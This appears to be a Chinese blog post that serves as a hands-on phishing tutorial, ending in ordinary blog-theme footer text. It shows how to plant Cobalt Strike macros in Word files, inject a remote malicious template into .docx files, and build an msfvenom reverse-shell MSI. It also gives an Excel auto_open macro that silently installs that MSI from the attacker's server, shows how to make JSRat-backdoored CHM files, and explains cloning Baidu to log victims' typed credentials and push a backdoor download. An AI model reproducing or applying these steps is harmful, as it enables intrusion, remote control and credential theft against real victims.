关于钓鱼

网络钓鱼

首先,牢记网络安全,熟读网络安全法。

网络钓鱼是最常见的社会工程学方式之一。

office钓鱼攻击

Office宏,译自英文单词Macro。宏是Office自带的一种高级教本特性,通过VBA代码,可以在Office去完成,某项特定的任务,而不必再重复相同的动作,目的是让用户完成一些任务自动化。宏病毒是寄存在文档或模块中的宏的计算机病毒,一旦打开这样的文件,其中的宏病毒就会执行。

环境 win10 x64、word、cobalt strike4

cobalt strike生成宏 image-20221117213715746

点击生成macros

image-20221117214949223

word文档里面需要打开开发模式

打开自定义工作区

image-20221125123705172

开发工具勾上。

image-20221125123800871

点击宏

image-20221125123909678

然后点击创建。

image-20221125124049870

把刚刚的宏代码复制过来

image-20221125124239591

然后保存

image-20221125124501150

右键运行就能在cs上看见结果。有了权限过来,就可以进行进一步的渗透。

image-20221125125637994

image-20221125125932856

docx文档远程模板注入

与传统的宏启用文档相比,这种攻击的好处是多方面的。在对目标执行网络攻击时,你可以把.docx的文档直接附加在电子邮件中。word远程模板执行宏就是利用word文档加载附加模板时的缺陷所发起的恶意请求而达到攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。

发送的文档本身不带恶意代码的,能过很多静态的检测。

方法:我们需要创建两个不同的文件。第一个是启用宏的模板,或是.dotm文件,他将包含恶意VBA宏。第二个是看似没有危害的.docx文件,他本身不包含恶意代码,只指向恶意模板文件的目标链接。

1.创建.dotm文件,跟上面差不多的步骤,新建docx文档,选择Vlsual basis

2.创建服务器链接放入docx文档里面。

python2:

1
sudo python -m SimpleHTTPServer 8088

python3:

1
sudo python -m http.server 8088

image-20221125133501148

image-20221125133515491

然后创建一个正常的docx文件,随便加载一个模板。

把创建的文档改后缀名为zip,然后解压进去找到这个setting.xml.rels文件。

image-20221125134231064

image-20221125134421805

把这里面的地址更改为刚刚创建的服务器的地址。

image-20221125134646699

复制和替换刚刚的文件。

image-20221125134817433

然后在这里压缩并改后缀名,双击打开就会执行宏代码。

image-20221125202209262

一样的可以在cobalt strike上进行操作。

excel 宏躲杀软检测

Excel一般指Microsoft office excel,是当下最流行的计算机数据处理软件。它跟office一样都是支持宏,所以一样存在宏病毒。当我们把恶意的宏代码放入excel里面,用户打开excel的宏就会被触发。

使用metasploit生成一个msi文件。

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.116.129 lport=1234 -f msi -o hack.msi

image-20221125203520256

一样的开启服务器

image-20221125203630429

image-20221125203712242

启动msfconsole

image-20221125204215075

在win10虚拟机上新建excel文件,然后右键插入宏表。

image-20221125204441365

然后插入代码

1
2
=EXEC("msiexec /q /i http://192.168.116.129:8088/hack.msi")
=HALT()

image-20221125204922457

A1这里设置为auto_open。

image-20221125205439795

然后这里就是我们制作好的宏文件

image-20221125205542121

可以看到这里已经在监听了。

image-20221125211059422

记得启用宏。

CHM电子书钓鱼

CHM:一编译的帮助文档。是微软新一代的帮助文件格式,利用HTML作为源文,把帮助内容以类似数据库的形式编译储存。

.Chm文件格式是HTML格式的拓展,他本来是一种用于给软件应用程序做用户手册的特殊文本格式。

chm的后门文件一般只针对Windows,,Linux不能直接打开chm文件,需要安装第三方软件才能打开chm文件。

制作chm钓鱼文件

项目地址:https://github.com/Ridter/MyJSRat。

下载项目:git clone https://github.com/Ridter/MyJSRat。

kali里面开启一个jsrat服务器

image-20221126164142304

然后看得到恶意代码所在。

image-20221126164241656

复制payload过去。

image-20221126165253014

注意payload里面第一个空格应该是逗号的,然后另存为ansi编码格式。

需要下载easychm工具。

easychm打开文件

image-20221126171003083

点击编译

image-20221126171056252

生成chm文件双击打开即可上线。

也可以使用cobalt strike制作CHM钓鱼。

image-20221126174715414

image-20221126174819322

然后上线cobalt sttrike

image-20221126181954207

克隆网站钓鱼

克隆网站主要是指模仿相关网页的页面格式,制作页面颜色、标识均与原网站视觉效果相同,且域名差距不大,被用于谋取利益的非法网站。当受害人访问的时候,如果对方没有防御心理,看到类似相同的网站一般情况下都会输入账号和密码,同时也可以诱导受害人下载恶意文件,同时也可以劫持网页记录键盘等操作

1.利用cobalt strike克隆网站

https://www.baidu.com 克隆百度

image-20221121012440012

点击生成克隆网址,

image-20221121012046760

可以看到这个生成的网站是和百度基本上都是一样的。image-20221121012547969

看得到用户的输入记录。

image-20221121012646075

上传一个后门文件

image-20221121013405184

然后就会提示下载image-20221121013558640

还可以加入一些攻击手段。

image-20221121013820636

然后网站钓鱼也是差不多的流程,到时候可以自己购买个域名作为钓鱼网站来进行攻击。

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家<br>QQ:513200455